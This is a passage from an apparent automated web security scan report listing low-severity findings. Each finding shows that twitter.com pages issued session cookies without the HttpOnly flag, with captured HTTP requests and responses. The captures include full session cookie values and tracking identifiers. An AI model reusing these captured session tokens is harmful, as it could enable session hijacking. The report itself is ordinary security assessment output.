The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /omniturecare HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.99. http://twitter.com/orbitz previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/orbitz

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHARCuctAToHaWQiJTI5YzUwMzZjM2IyNTkw%250AODE5YWQ5YTc2NTQwNjY3MDgyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--6001935ba9443587464c66ae0b4df1de23ed2362; domain=.twitter.com; path=/
k=173.193.214.243.1296661350299032; path=/; expires=Wed, 09-Feb-11 15:42:30 GMT; domain=.twitter.com
guest_id=129666135281353758; path=/; expires=Fri, 04 Mar 2011 15:42:32 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbitz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.100. http://twitter.com/privacy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.101. http://twitter.com/prolawrssfeed previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/prolawrssfeed

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTIyYjQwYTg5NDU5NDgxMjdmYTViMTVjYjk1OTc5YzMyIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI3eaj4S0B--7a5fc965bf09be34b2e39c47e092a5479cc149c1; domain=.twitter.com; path=/
k=173.193.214.243.1296570768467881; path=/; expires=Tue, 08-Feb-11 14:32:48 GMT; domain=.twitter.com
guest_id=129657077116353647; path=/; expires=Thu, 03 Mar 2011 14:32:51 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /prolawrssfeed HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.102. http://twitter.com/qianam previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/qianam

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTBlN2VlZWExZGU0MWVmMjhhZGFkMGZmNTI1NjBmNzFlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIT0%252Bk4S0B--fdd7d7f34f7fc82c819ff96f72fe018f82127c14; domain=.twitter.com; path=/
k=173.193.214.243.1296570797885016; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
guest_id=129657079790164862; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /qianam HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.103. http://twitter.com/rosyresources previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/rosyresources

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTZmMzIyN2Q2ZDU4YjUxNDg1ODIxYTVlNGIxZTFjZmU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI8Fek4S0B--3e8ab80412a1832934d5b0c95fbe9e0537185fe8; domain=.twitter.com; path=/
k=173.193.214.243.1296570800095954; path=/; expires=Tue, 08-Feb-11 14:33:20 GMT; domain=.twitter.com
guest_id=129657080010985701; path=/; expires=Thu, 03 Mar 2011 14:33:20 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rosyresources HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.104. http://twitter.com/sarahdessen previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sarahdessen

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sarahdessen HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.105. http://twitter.com/science previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/science

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /science HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.106. http://twitter.com/scribe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/scribe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scribe?log=%7B%22event_name%22%3A%22toptweets_success%22%7D&ts=1296663648703&category=ab_home_page HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmc=43838368; __utmv=43838368.lang%3A%20en; __utmb=43838368.3.10.1296663641; _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzA6%250AB2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--0a212e703bac9709a6ddd2f1c5c5ab3b89a5d893

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:19:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663595-76376-35145
ETag: "7215ee9c7d9dc229d2921a40e899ec5f"
Last-Modified: Wed, 02 Feb 2011 16:19:55 GMT
X-Runtime: 0.00860
Content-Type: text/javascript; charset=utf-8
Content-Length: 1
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

12.107. http://twitter.com/search previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /search HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664216-12698-6173
ETag: "f4b981b1e3376280b23d220fab477870"
Last-Modified: Wed, 02 Feb 2011 16:30:16 GMT
X-Runtime: 0.05554
Content-Type: text/html; charset=utf-8
Content-Length: 19135
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

12.108. http://twitter.com/sessions/change_locale previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sessions/change_locale

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Feb 2011 16:31:50 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296664310-40175-6868
Last-Modified: Wed, 02 Feb 2011 16:31:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

12.109. http://twitter.com/sethmeyers21 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sethmeyers21

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzciCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiUwZWU5%250AYmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OToVaW5fbmV3X3VzZXJfZmxv%250AdzA%253D--5d5e0cde97546ff3bb3adffea964a59e2e281451; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sethmeyers21 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.110. http://twitter.com/share previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/share

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTU5ZDYxNmFhNjRjYTFmNTllYTk0ZGYwNzZhYWNkYmNmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI2qHf4S0B--969cc40d2abd05ecf304291ee5fe90fcaf706612; domain=.twitter.com; path=/
k=173.193.214.243.1296574682651126; path=/; expires=Tue, 08-Feb-11 15:38:02 GMT; domain=.twitter.com
guest_id=129657468565663431; path=/; expires=Thu, 03 Mar 2011 15:38:05 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /share HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Tue, 01 Feb 2011 15:38:05 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296574685-27986-39397
Last-Modified: Tue, 01 Feb 2011 15:38:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296574682651126; path=/; expires=Tue, 08-Feb-11 15:38:02 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657468565663431; path=/; expires=Thu, 03 Mar 2011 15:38:05 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTU5ZDYxNmFhNjRjYTFmNTllYTk0ZGYwNzZhYWNkYmNmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI2qHf4S0B--969cc40d2abd05ecf304291ee5fe90fcaf706612; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...

12.111. http://twitter.com/signup previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/signup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.0 302 Found
Date: Wed, 02 Feb 2011 16:30:15 GMT
Server: hi
Status: 302 Found
X-Transaction: 1296664215-68105-21351
Last-Modified: Wed, 02 Feb 2011 16:30:15 GMT
Location: https://twitter.com/signup
X-Runtime: 0.00546
Content-Type: text/html; charset=utf-8
Content-Length: 92
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="https://twitter.com/signup">redirected</a>.</body></html>

12.112. http://twitter.com/sp_arizona previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sp_arizona

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTdkN2FlNWM5N2ZiNDExYmMwMzUxZDk0N2E3NTNjZWI4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIkEyk4S0B--3dc48e749df60de049063cbf90ad7fc867311bc5; domain=.twitter.com; path=/
k=173.193.214.243.1296570797191212; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
guest_id=129657079719886226; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sp_arizona HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.113. http://twitter.com/sp_oregon previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sp_oregon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTg4M2FlMWU1YTdjODcyZDAwZjNmMDYzNDM3NTg4NjYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIo0uk4S0B--8c1cd526ce98f4b9a27c95f038357bd12cd59e4e; domain=.twitter.com; path=/
k=173.193.214.243.1296570796952504; path=/; expires=Tue, 08-Feb-11 14:33:16 GMT; domain=.twitter.com
guest_id=12965707969606832; path=/; expires=Thu, 03 Mar 2011 14:33:16 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sp_oregon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.114. http://twitter.com/sp_tx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/sp_tx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

